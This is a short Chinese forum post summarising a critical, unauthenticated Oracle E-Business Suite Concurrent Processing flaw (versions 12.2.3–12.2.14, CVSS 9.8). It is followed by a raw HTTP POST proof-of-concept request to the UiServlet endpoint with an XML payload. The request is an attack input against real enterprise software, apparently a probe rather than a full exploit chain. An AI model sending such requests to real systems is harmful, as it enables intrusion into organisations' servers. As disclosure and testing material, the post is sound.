Oracle E-Business Suite中的Oracle并行处理产品(组件:BI Publisher集成)存在漏洞。受影响的支持版本为12.2.3-12.2.14。该漏洞易于利用,允许未经身份验证的攻击者通过HTTP进行网络访问,从而危及Oracle并行处理。成功利用此漏洞可导致Oracle并行处理被接管。CVSS 3.1基础得分为9.8(对机密性、完整性和可用性的影响)。CVSS向量:(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)。
POC POST /OA_HTML/configurator/UiServlet HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Accept-Encoding: gzip, deflate Accept: */* Connection: close Host: xx.x.xx.xx Content-Length: 364 Content-Type: application/x-www-form-urlencoded
redirectFromJsp=1&getUiType=<?xml version="1.0" encoding="UTF-8"?> <initialize> <param name="init_was_saved">test</param> <param name="ui_def_id">0</param> <param name="config_effective_usage_id">0</param> <param name="ui_type">Applet</param> </initialize>
| 
|手机版|小黑屋|吾要学习网
( 陕ICP备2025065860号-1 )|网站地图|陕公网安备61010302001313号
发表于 2025-10-14 09:15:32